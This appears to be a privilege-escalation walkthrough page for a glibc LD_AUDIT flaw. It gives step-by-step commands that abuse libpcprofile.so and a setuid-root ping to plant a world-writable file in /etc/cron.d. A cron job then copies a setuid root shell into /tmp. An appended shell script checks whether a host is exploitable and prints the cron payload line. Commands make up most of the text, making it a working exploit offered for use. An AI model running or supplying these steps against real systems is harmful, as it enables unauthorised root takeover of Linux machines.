GNU C Library

ldd --version

GNU C Library 2.x (libc6)

Vulnerable builds of GNU C Library 2.x (libc6) honour LD_AUDIT for setuid binaries, which gives a local privilege escalation: the dynamic loader will load a library named in LD_AUDIT into a setuid-root process, and any constructor in that library runs as root before the loader decides whether the library is a valid audit module. Patched builds treat LD_AUDIT like LD_PRELOAD in secure-execution mode (names with slashes are ignored and only libraries from the standard directories are considered), which closes this chain.

Enumeration

ldd --version

Exploitation

Step 1: The file creation mask (umask) is inherited by child processes and is not reset by a setuid execve, so it still applies to any file the privileged program creates on our behalf. Clearing it to 0 means the file created later will be world-writable.

umask 0

Step 2: libpcprofile.so ships in the libc package itself, so it is present on every affected system and lives in one of the loader's default search directories. That is what allows a bare file name in LD_AUDIT to resolve to it without a path (on multiarch systems the path is /lib/<triplet>/libpcprofile.so rather than /lib/libpcprofile.so; ldconfig -p shows where the loader will find it).

dpkg -S /lib/libpcprofile.so
ls -l /lib/libpcprofile.so
ldconfig -p | grep pcprofile

Step 3: One of libpcprofile's constructors is unsafe to run with elevated privileges: as soon as the library is loaded it creates (or truncates) the file named in the PCPROFILE_OUTPUT environment variable. Loading it through LD_AUDIT into a setuid-root binary such as ping therefore creates that file as root. ld.so then rejects the library as an audit module because it does not define la_version, and ping exits with a usage error, but by that point the file already exists, root-owned and world-writable because of the umask from Step 1. The target binary must actually be setuid root; a ping that relies on capabilities instead will not do.

ls -l "$(command -v ping)"
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ls -l /etc/cron.d/exploit

Step 4: The world-writable file in /etc/cron.d is now a system crontab we control. Write a job that runs as root every minute and copies a shell into /tmp with the setuid bit set. cron picks the file up on its next scan, so /tmp/exploit appears within about a minute; repeat the ls until it shows -rwsr-xr-x root root.

printf "* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n" > /etc/cron.d/exploit
ls -l /tmp/exploit

Step 5: Run the setuid copy to get a root shell. dash is used because it keeps the effective UID it was started with; a setuid copy of bash would drop privileges unless started with -p.

/tmp/exploit
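The following script is an added example, not part of the original page or of any glibc tooling. It turns Steps 1 to 5 into a pre-flight check: it verifies each precondition (unprivileged user, a setuid-root ping, libpcprofile.so in a default loader directory) and then runs the Step 3 trick against a scratch path instead of /etc/cron.d, reporting whether ld.so really ran the constructor as root. It assumes ping is the setuid binary (override with PROBE_BIN) and that the loader directories listed in find_libpcprofile are the relevant ones; the cron_line function just reproduces the Step 4 crontab line for a caller-chosen destination.

```shell
#!/bin/sh
# Added example (not from the original page): pre-flight checks for the
# libpcprofile LD_AUDIT chain. Runs a harmless probe (one empty file in a
# scratch path) rather than touching /etc/cron.d.
# Assumed: a setuid-root ping (override with PROBE_BIN) and libpcprofile.so
# in one of the loader directories listed in find_libpcprofile.

if [ -z "${PROBE_BIN:-}" ]; then
    PROBE_BIN=$(command -v ping 2>/dev/null) || PROBE_BIN=""
fi

# Print the first libpcprofile.so found in a default loader directory.
# A bare name in LD_AUDIT only resolves if the library lives in one of these.
find_libpcprofile() {
    for d in /lib /lib64 /usr/lib /usr/lib64 \
             /lib/x86_64-linux-gnu /usr/lib/x86_64-linux-gnu \
             /lib/i386-linux-gnu /usr/lib/i386-linux-gnu; do
        if [ -f "$d/libpcprofile.so" ]; then
            printf '%s\n' "$d/libpcprofile.so"
            return 0
        fi
    done
    return 1
}

# True if the path is owned by uid 0 (POSIX find, no GNU extensions).
owned_by_root() {
    [ -n "$(find "$1" -prune -user root -print 2>/dev/null)" ]
}

# True if the path is a setuid binary owned by root, i.e. a program for
# which the loader runs in secure-execution mode.
is_setuid_root() {
    [ -u "$1" ] && owned_by_root "$1"
}

# The Step 4 crontab line, parameterised on the destination path.
cron_line() {
    printf '* * * * * root cp /bin/dash %s; chmod u+s %s\n' "$1" "$1"
}

# Probe whether ld.so runs libpcprofile's constructor with root privileges.
# Exit status: 0 = vulnerable (a root-owned file appeared on behalf of an
# unprivileged user), 1 = not vulnerable, 2 = a precondition is missing
# (running as root, no setuid-root ping, or no libpcprofile.so).
probe_ld_audit() {
    out="$1"
    [ "$(id -u)" -ne 0 ] || return 2
    [ -n "$PROBE_BIN" ] && is_setuid_root "$PROBE_BIN" || return 2
    find_libpcprofile >/dev/null || return 2
    rm -f "$out"
    # Same environment as Step 3, pointed at a scratch file. ping fails on
    # usage and ld.so complains about la_version; both are expected.
    ( umask 0
      LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$out" "$PROBE_BIN" >/dev/null 2>&1 ) || :
    if [ -e "$out" ] && owned_by_root "$out"; then
        return 0
    fi
    rm -f "$out"
    return 1
}

# Usage: sh probe.sh --run   (as an unprivileged user)
if [ "${1:-}" = "--run" ]; then
    probe="${TMPDIR:-/tmp}/ldaudit_probe.$$"
    if probe_ld_audit "$probe"; then
        echo "vulnerable: $probe is root-owned; the Step 4 line would be:"
        cron_line /tmp/exploit
        rm -f "$probe"
    else
        rc=$?
        echo "not exploitable this way (probe status $rc)"
    fi
fi
```

Run it as the unprivileged user you would exploit from: status 2 means a precondition is missing (most often ping uses capabilities rather than setuid, or the machine is not Debian-style), status 1 means the loader ignored LD_AUDIT for the setuid binary and the chain will not work, and status 0 means the constructor ran as root and Step 4 onwards applies.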
